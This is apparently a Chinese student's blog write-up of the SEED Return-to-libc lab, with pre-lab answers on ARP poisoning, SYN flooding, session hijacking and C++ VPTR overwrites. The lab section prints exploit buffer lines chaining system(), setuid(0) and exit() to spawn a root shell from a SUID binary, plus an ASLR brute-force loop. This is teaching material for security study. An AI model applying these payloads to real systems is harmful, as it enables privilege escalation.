漏洞挖掘——实验10 Return-to-libc Attack Lab

15 篇文章 4 订阅

漏洞挖掘前言

题目

Lab

Return-to-libc Attack Lab

Pre

1、名词解释:ARP cache poisoning,ICMP Redirect Attack,SYN Flooding Attack,TCP Session Hijacking。如果想监听局域网内另外一台机器,一般先要进行什么步骤?

2、阅读下面这篇文章并且了解Netwox/Netwag的基本操作:
Netwox/Netwag Troubleshooting guide 
http://www.cis.syr.edu/~wedu/seed/Documentation/Misc/netwox.pdf

3、解释linux用root执行下面两条命令
sysctl -q net.ipv4.tcp_max_syn_backlog
sysctl -w net.ipv4.tcp_syncookies=0

的含义和用途。

4、阅读Smashing C++ VPTRs这篇文章,阐述其原理。
http://www.phrack.org/issues.html?issue=56&id=8

5、考虑Linux环境下如何实现精确计算程序运行的时间,搜索下相关资料。

 

 

解答

Lab

Return-to-libc Attack Lab

Task1: Exploiting the Vulnerability

Step1:初始设置

关闭地址随机化,编译漏洞文件,注意设置栈不可执行但要关闭栈保护,并且赋予其SUID权限。

 

Step2:构造一个简单的badfile文件

使用vim构造一个badfile文件,里面只写入AAAA,这样方便我们使用gdb调试查看返回地址离fread写入处的距离。

 

Step3:使用gdb查看函数的地址

 

 

Step4:将参数放入环境变量,并获取其地址

把system的参数“/bin/sh”放入环境变量MYBS,并使用getenvaddr.c获取环境变量的地址。getenvaddr.c文件内容如下:

 

Step5:构造exploit.c文件

由以上分析得出以下代码:

  *(long *) &buf[24] = 0xb7e5f430 ;   //  system()

  *(long *) &buf[28] = 0xb7e52fb0 ;   //  exit()

  *(long *) &buf[32] = 0xbffffe7b ;   //  "/bin/sh"

编译执行exploit.c文件,生成新的badfile文件。

运行漏洞程序retlib,实行攻击。

可以看出攻击成功!

 

 

Task2: 扩充实验

执行

system(” usr/bin/id”);

setuid(0);

system(”/bin/sh”);

exit();

四个函数。

 

Step1:重新准备文件

将漏洞程序retlib、攻击文件exploit中的40换成120,重新编译、赋予SUID。

 

Step2:查看函数地址

 

 

Step3:寻找pop函数

使用objdump -d retlib命令

可以看到,在0x080485b8处有一个pop函数,我们就用这个。

 

Step4:把参数放进环境变量

 

Step5:构造exploit.c文件

  *(long *) &buf[24] = 0xb7e5f430 ;   //  system()

  *(long *) &buf[28] = 0x080485b8 ;   //  pop edp

  *(long *) &buf[32] = 0xbffffcf2 ;   //  "/usr/bin/id"

  *(long *) &buf[36] = 0xb7ed8e40 ;   //  setuid()

  *(long *) &buf[40] = 0x080485b8 ;   //  pop edp

  *(long *) &buf[44] = 0x00000000 ;   //  0

  *(long *) &buf[48] = 0xb7e5f430 ;   //  system()

  *(long *) &buf[52] = 0x080485b8 ;   //  pop edp

  *(long *) &buf[56] = 0xbffffe7b ;   //  "/bin/sh"

  *(long *) &buf[60] = 0xb7e52fb0 ;   //  exit()

编译执行exploit.c文件,生成新的badfile文件。

运行漏洞程序retlib,实行攻击。

攻击成功!!!

 

 

Task3: Address Randomization

打开地址随机化,理论是存在成功可能性的,但是由于随机的函数地址太多了,这个可能性是很小的,我执行了一段时间也没有执行出来。

使用以下命令循环执行漏洞文件:

sh -c "while [ 1 ]; do ./retlib; done;"

 

Task4: Stack Guard Protection

打开栈保护,重新编译并执行文件,发现攻击失败。原因也是很明显的,栈保护打开后不允许溢出,而我们的攻击只是绕过了栈不可执行,仍然是需要栈溢出的。

 

Pre

1、名词解释:ARP cache poisoning,ICMP Redirect Attack,SYN Flooding Attack,TCP Session Hijacking。如果想监听局域网内另外一台机器,一般先要进行什么步骤?

ARP cache poisoning:ARP缓存是ARP协议的重要组成部分。一旦MAC地址和IP地址之间的映射被解析为执行ARP协议的结果,映射将被缓存。因此,如果映射已经在缓存中,则不需要重复ARP协议。然而,由于ARP协议是无状态的,所以高速缓存可能会被恶意制作的ARP消息中毒(篡改)。这种攻击称为ARP缓存中毒攻击。

ICMP Redirect Attack:即ICMP重定向攻击工作,路由器使用ICMP重定向消息为主机提供最新的路由信息,主机最初具有最少的路由信息。 当主机接收到ICMP重定向消息时,它将根据消息修改其路由表。 由于缺乏验证,如果攻击者希望受害者以特定方式设置路由信息,则可以向受害者发送伪造的ICMP重定向消息,并欺骗受害者修改其路由表。

SYN Flooding Attack:这是是一种广为人知的DoS(拒绝服务攻击)是DDoS(分布式拒绝服务攻击)的方式之一,利用TCP协议缺陷,发送大量伪造的TCP连接请求,从而使得被攻击方资源耗尽(CPU满负荷或内存不足)。

TCP Session Hijacking:即会话劫持,是指通过非常规手段,来得到合法用户在客户端和服务器段进行交互的特征值(一般为sessionid),然后伪造请求,去访问授权用户的数据。

如果要监听局域网内另一台机器,带网络管理员的话直接在网络设备上面开启端口镜像,然后在电脑上安装Wireshark、科来网络分析等软件,对网络进行正常分析;普通用户的话,无论是路由器还是交换机连接,既然都是局域网内,那么监听嗅探的方法基本都是一致的,就是要用到ARP欺骗攻击攻击,然后再抓包。

 

 

2、阅读下面这篇文章并且了解Netwox/Netwag的基本操作:

Netwox/Netwag Troubleshooting guide

http://www.cis.syr.edu/~wedu/seed/Documentation/Misc/netwox.pdf

嗅探数据包工具:使用vmnet8作为用来嗅探的设备;通过查看本地信息,了解如何映射到Netwag中的设备名称;提供pcap过滤器来优化。

欺骗IP数据包工具:发送伪ip数据包它使用户可以完全控制ip头;在使用此工具之前进行ARP缓存中毒攻击

欺骗IP/ICMP数据包工具:允许攻击者使用任意IP参数发送任意长度的ICMP数据包、允许用户指定ICMP头参数以及IP头参数

欺骗TCP/IP数据包工具:允许用户修改数据包的IP头,TCP头和TCP数据,能用于会话劫持。

发送连续ARP回复工具:需要设备名称、以及源和目标IP地址以及以太网地址。

 

 

3、解释linux用root执行下面两条命令

sysctl -q net.ipv4.tcp_max_syn_backlog

sysctl -w net.ipv4.tcp_syncookies=0的含义和用途。

sysctl -q net.ipv4.tcp_max_syn_backlog:Tcp syn队列的最大长度,在进行系统调用connect时会发生Tcp的三次握手,server内核会为Tcp维护两个队列,Syn队列和Accept队列,修改net.ipv4.tcp_max_syn_backlog使之增大可以接受更多的网络连接。 注意此参数过大可能遭遇到Syn flood攻击,即对方发送多个Syn报文端填充满Syn队列,使server无法继续接受其他连接。

sysctl -w net.ipv4.tcp_syncookies=0:tcp_syncookies是一个开关,是否打开SYN Cookie功能,该功能可以防止部分SYN攻击。置为0则关闭这个功能。

 

 

4、阅读Smashing C++ VPTRs这篇文章,阐述其原理。

http://www.phrack.org/issues.html?issue=56&id=8

本文提到了C++虚拟指针,虚拟方法与非虚拟方法的一个不同之处是,非虚拟方法的调用是在编译时确定(通常称为“静态绑定”),而虚拟方法的调用却是在程序时确定的(通常称为“动态绑定”)。

首先我们构造我们自己的VTABLE,其中的指针入口将指向我们期望运行的代码(如shellcode等)。然后再使缓冲区溢出,并覆盖VPTR,使其指向我们的VTABLE。

 

 

5、考虑Linux环境下如何实现精确计算程序运行的时间,搜索下相关资料。

#include <sys/time.h>

int gettimeofday(struct timeval*tv, struct timezone *tz);

gettimeofday是计算机函数,使用C语言编写程序需要获得当前精确时间(1970年1月1日到现在的时间),或者为执行计时。它获得的时间精确到微秒(1e-6 s)量级。在一段代码前后分别使用gettimeofday可以计算代码执行时间。

它由于直接提取硬件时钟,所以得到的值很精确,但是因为此,这个方法只能计算程序开始时间和结束时间的差值。而此时系统中如果在运行其他的后台程序,可能会影响到最终结果的值。

 

 

  • 2
    点赞
  • 0
    评论
  • 7
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 技术黑板 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值